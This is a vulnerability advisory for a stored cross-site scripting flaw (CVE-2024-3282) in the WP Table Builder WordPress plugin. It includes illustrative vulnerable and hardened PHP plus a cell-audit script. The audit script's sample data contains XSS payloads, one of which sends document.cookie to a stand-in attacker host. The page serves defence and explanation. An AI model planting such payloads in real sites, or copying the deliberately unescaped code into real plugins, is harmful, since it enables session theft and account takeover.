CVE-2024-3282 in WP Table Builder Plugin
Summary
by MITRE • 08/23/2024
The WP Table Builder WordPress plugin through 1.5.0 does not sanitise and escape some of its Table data, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)
Analysis
by VulDB Data Team • 03/13/2025
WP Table Builder for WordPress, in versions up to and including 1.5.0, contains a stored cross-site scripting vulnerability reachable by high-privilege users such as administrators. It stems from the plugin neither sanitizing table data before storing it nor escaping it when rendering, and it persists even where the unfiltered_html capability has been withheld from those users (the default for site administrators in a multisite network, where only super admins hold it). The flaw lies in the plugin's handling of user-supplied table content, which is written to the WordPress database and later emitted into pages without filtering or escaping.
The vulnerability is triggered when an administrator or other privileged user creates or edits table content through the plugin's interface. The plugin stores the submitted cell data without applying an allowlist filter and then outputs it without escaping. Either failure alone would be enough; together they mean markup such as a script tag or an event-handler attribute is persisted and executes every time the table is displayed. What makes this notable is the interaction with unfiltered_html: WordPress core runs post content through its kses allowlist for users who lack that capability, but data a plugin stores and renders on its own path receives no such filtering unless the plugin applies it. The capability restriction, which multisite relies on to stop site administrators from publishing scripts, is therefore ineffective for this plugin's data.
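To make the dual failure concrete, here is an added example of a hypothetical table plugin's save and render paths, first in the vulnerable shape described above and then hardened. This is illustrative code written for this page, not WP Table Builder's own source; the hook names, meta key and nonce action are assumptions, and it requires a loaded WordPress runtime for current_user_can(), wp_kses_post(), esc_attr() and the post-meta functions.

```php
<?php
/**
 * Added example (hypothetical plugin code, not WP Table Builder's source).
 * Assumes a loaded WordPress runtime. DEMO_META_KEY, the AJAX action, the
 * nonce action and the shortcode name are all assumptions made for this page.
 */

const DEMO_META_KEY = '_demo_table_cells'; // assumed storage location

// BEFORE: cells are persisted and echoed verbatim. Nothing consults
// unfiltered_html, so a multisite site admin (who lacks it) can still
// store "<img src=x onerror=...>" and it runs for every viewer.
function demo_save_cells_vulnerable( int $table_id, array $cells ): void {
    update_post_meta( $table_id, DEMO_META_KEY, wp_unslash( $cells ) );
}

function demo_render_table_vulnerable( int $table_id ): string {
    $html = '<table class="demo-table">';
    foreach ( (array) get_post_meta( $table_id, DEMO_META_KEY, true ) as $row ) {
        $html .= '<tr>';
        foreach ( (array) $row as $cell ) {
            $html .= '<td>' . $cell . '</td>'; // stored markup goes out unescaped
        }
        $html .= '</tr>';
    }
    return $html . '</table>';
}

// AFTER: filter on save with the capability semantics core applies to
// post_content, and escape on output regardless of who saved the data.
function demo_save_cells_hardened( int $table_id, array $cells ): void {
    if ( ! current_user_can( 'edit_post', $table_id ) ) {
        wp_die( 'Insufficient privileges', 403 );
    }
    $cells = wp_unslash( $cells );
    if ( ! current_user_can( 'unfiltered_html' ) ) {
        // Users without unfiltered_html get the kses allowlist: <script>,
        // on* attributes and javascript: URLs are removed before storage.
        $cells = map_deep( $cells, 'wp_kses_post' );
    }
    update_post_meta( $table_id, DEMO_META_KEY, $cells );
}

function demo_render_table_hardened( int $table_id, string $css_class = 'demo-table' ): string {
    $html = '<table class="' . esc_attr( $css_class ) . '">';
    foreach ( (array) get_post_meta( $table_id, DEMO_META_KEY, true ) as $row ) {
        $html .= '<tr>';
        foreach ( (array) $row as $cell ) {
            // Late escaping: running wp_kses_post() at output also neutralises
            // script-bearing cells already in the database, including ones
            // written by the vulnerable save path above.
            $html .= '<td>' . wp_kses_post( (string) $cell ) . '</td>';
        }
        $html .= '</tr>';
    }
    return $html . '</table>';
}

// Wiring (names assumed): an admin-ajax save handler and a front-end shortcode.
add_action( 'wp_ajax_demo_table_save', function () {
    check_ajax_referer( 'demo_table_save', 'nonce' );
    $table_id = absint( $_POST['table_id'] ?? 0 );
    $cells    = isset( $_POST['cells'] ) && is_array( $_POST['cells'] ) ? $_POST['cells'] : [];
    demo_save_cells_hardened( $table_id, $cells );
    wp_send_json_success();
} );

add_shortcode( 'demo_table', function ( $atts ) {
    $atts = shortcode_atts( [ 'id' => 0 ], $atts, 'demo_table' );
    return demo_render_table_hardened( absint( $atts['id'] ) );
} );
```

The save-time gate reproduces what core does for post content, so a site administrator without unfiltered_html can no longer persist script. Filtering again at render time is a deliberate choice: it means the widget never emits script even for rows stored before the fix, at the cost that super admins also cannot render raw HTML through it. If a product needs that, keep the output filter and grant raw HTML through a separate, explicitly reviewed path rather than by dropping the render-side escaping.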
The impact goes beyond script execution in the victim's browser: injected JavaScript runs with the session and origin of whoever views the table, so it can be used for session hijacking, theft of credentials or nonces, and actions performed in the victim's name. In a multisite network this is a privilege escalation path, since a site administrator without unfiltered_html can plant script that later runs in a super admin's session. Because the payload is stored, it fires on every page view until the data is cleaned, which suits long-term persistence. The weakness is CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'); the closest ATT&CK technique is T1059.007 (Command and Scripting Interpreter: JavaScript).
Mitigation starts with updating the plugin to a release later than 1.5.0 that addresses the sanitization and escaping gaps, but the update alone does not remove payloads already stored. Administrators should review existing table data for injected markup (script tags, on* event-handler attributes, javascript: URLs) and clean or recreate affected tables, and should keep monitoring for unexpected table modifications. A web application firewall adds application-layer defense in depth against common payloads, though it is no substitute for the fix. Access to the table builder should be limited to the accounts that need it, and in multisite the gap between what site administrators are meant to be able to publish and what this plugin let them store is worth re-checking after the update. Automated plugin and theme scanning can surface the same class of sanitization flaw elsewhere in the installation.
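As an added example of the data review recommended above, the following stand-alone PHP script flags table cells that carry script-capable markup. It is written for this page and is not part of the plugin; it does not know where WP Table Builder stores its tables, so it takes rows as a plain array (the $stored_cells below is constructed sample data) and is meant as a triage aid to run over an export, not an automatic cleaner.

```php
<?php
// Added example: stand-alone triage script for stored table cells. Run with:
//   php audit-cells.php
// The pattern set and the sample rows are constructed for this page.

$patterns = [
    'script tag'      => '/<\s*script\b/i',
    'event handler'   => '/\bon[a-z]+\s*=/i',
    'javascript: URI' => '/(?:href|src|action|formaction)\s*=\s*["\']?\s*javascript\s*:/i',
    'active embed'    => '/<\s*(?:iframe|object|embed|svg|math|base|meta)\b/i',
];

// Returns the labels of every pattern that matches the cell, checked against
// both the raw string and an entity-decoded copy: a cell stored as
// "&lt;script&gt;" is inert as-is but dangerous if any renderer decodes it.
function demo_audit_cell( string $cell, array $patterns ): array {
    $hits  = [];
    $views = [
        'raw'     => $cell,
        'decoded' => html_entity_decode( $cell, ENT_QUOTES | ENT_HTML5, 'UTF-8' ),
    ];
    foreach ( $views as $view => $text ) {
        foreach ( $patterns as $label => $re ) {
            if ( preg_match( $re, $text ) ) {
                $hits[] = "$label ($view)";
            }
        }
    }
    return array_values( array_unique( $hits ) );
}

// Walks a rows-of-cells array and reports each suspicious cell with its position.
function demo_audit_table( array $rows, array $patterns ): array {
    $findings = [];
    foreach ( $rows as $r => $row ) {
        foreach ( (array) $row as $c => $cell ) {
            $hits = demo_audit_cell( (string) $cell, $patterns );
            if ( $hits ) {
                $findings[] = [ 'row' => $r, 'col' => $c, 'hits' => $hits, 'cell' => (string) $cell ];
            }
        }
    }
    return $findings;
}

// Constructed sample: one benign formatted cell and three injected ones.
$stored_cells = [
    [ 'Product',   'Price', 'Notes' ],
    [ 'Widget',    '$10',   '<b>In stock</b>' ],
    [ 'Gadget',    '$20',   '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' ],
    [ 'Doohickey', '$30',   '<a href="javascript:alert(document.domain)">details</a>' ],
    [ 'Thing',     '$40',   '&lt;script&gt;alert(1)&lt;/script&gt;' ],
];

foreach ( demo_audit_table( $stored_cells, $patterns ) as $f ) {
    printf( "row %d col %d: %s\n  %s\n", $f['row'], $f['col'], implode( ', ', $f['hits'] ), $f['cell'] );
}
```

The regular expressions are intentionally broad and will produce some false positives (any attribute whose name starts with "on", for instance), which is the right trade-off for a review pass; every hit should be inspected and the table recreated from trusted content rather than edited in place. Feeding real data in means exporting the plugin's stored rows to the array shape above, since the storage location is not something this page establishes.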